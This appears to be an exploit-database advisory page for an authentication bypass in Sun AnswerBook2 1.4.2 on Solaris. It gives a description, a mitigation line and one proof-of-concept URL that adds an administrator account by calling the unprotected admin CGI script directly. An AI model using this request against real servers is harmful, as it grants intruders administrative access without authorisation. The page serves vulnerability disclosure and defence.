header-logo
Suggest Exploit
vendor:
AnswerBook2
by:
SecurityFocus
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: AnswerBook2
Affected Version From: 1.4.2
Affected Version To: 1.4.2
Patch Exists: YES
Related CWE: N/A
CPE: a:sun_microsystems:answerbook2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Solaris
2002

Lack of Authentication Checks in AnswerBook2

A lack of authentication checks for certain scripts within the administration interface of AnswerBook2 versions 1.4.2 and prior, for Solaris, allows remote users to create administration accounts. By directly accessing the /cgi-bin/admin/admin script present under the AnswerBook2 dwhttpd web server, it is possible to add users to the administration interface. This will allow the attacker to read log files and manage content.

Mitigation:

Ensure that authentication checks are in place for all scripts within the AnswerBook2 administration interface.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1554/info

A lack of authentication checks for certain scripts within the administration interface of AnswerBook2 versions 1.4.2 and prior, for Solaris, allows remote users to create administration accounts. By directly accessing the /cgi-bin/admin/admin script present under the AnswerBook2 dwhttpd web server, it is possible to add users to the administration interface. This will allow the attacker to read log files and manage content. 

http://www.example.com:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe"

Navigation

Suggest Exploit

Services By CQR